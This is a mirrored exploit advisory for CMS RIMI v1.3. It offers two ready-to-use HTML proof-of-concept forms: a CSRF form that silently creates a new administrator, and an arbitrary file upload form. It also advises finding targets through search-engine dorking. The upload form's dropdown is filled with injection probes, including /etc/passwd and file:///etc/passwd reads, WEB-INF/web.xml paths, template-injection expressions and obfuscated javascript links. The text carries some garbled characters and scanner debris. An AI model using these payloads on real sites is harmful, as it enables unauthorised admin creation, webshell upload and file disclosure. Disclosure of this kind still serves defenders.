Share
## https://sploitus.com/exploit?id=PACKETSTORM:180338
=============================================================================================================================================  
| # Title : CMS RIMI v1.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://github.com/myroot593/RIMICMS |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 9.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Profile User Form</title>  
</head>  
<body>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
<!-- Text input for username -->  
<label for="username">Username:</label>  
<input type="text" id="username" name="username" required>  
  
<!-- Password input for password -->  
<label for="password">Password:</label>  
<input type="password" id="password" name="password" required>  
  
<!-- Password input for confirm password -->  
<label for="confirm_password">Confirm Password:</label>  
<input type="password" id="confirm_password" name="confirm_password" required>  
  
<!-- Text input for name -->  
<label for="nama">Nama:</label>  
<input type="text" id="nama" name="nama" required>  
  
<!-- Text input for email -->  
<label for="email">Email:</label>  
<input type="email" id="email" name="email" required>  
  
<!-- Hidden input for user ID -->  
<input type="hidden" name="id" value="">  
  
<!-- Submit button -->  
<button type="submit">Submit</button>  
</form>  
</body>  
</html>  
  
  
------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------  
  
  
[+] Go to the line 3.  
  
[+] Set the target site link Save changes and apply .  
  
[+] Your file : 127.0.0.1/cmsrimi/content   
  
[+] save code as poc.html .  
  
<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
<div class="form-group ">  
<label>Judul :</label>  
<input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
<span><p class="error-form"></p></span>  
</div>  
<div class="form-group ">  
<label>Isi Berita :</label>  
<textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
<span><p class="error-form"></p></span>  
</div>  
<div class="form-group">  
<label>Kategori Berita :</label>  
<select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p>  
</div>  
<div class="form-group">  
<label>Status:</label>  
<select class="form-control" name="status_berita" id="status_berita">  
<option value="Diterbitkan">Diterbitkan</option>  
<option value="Draft">Draft</option>  
</select>  
</div>  
<div class="form-group">  
<label>Gambar Berita</label>  
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
<p class="error-form"></p>  
</div>  
<button type="submit" class="btn btn-primary">Submit</button>  
</form>  
<p class="error-form"></p>   
<p class="error-form"></p>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================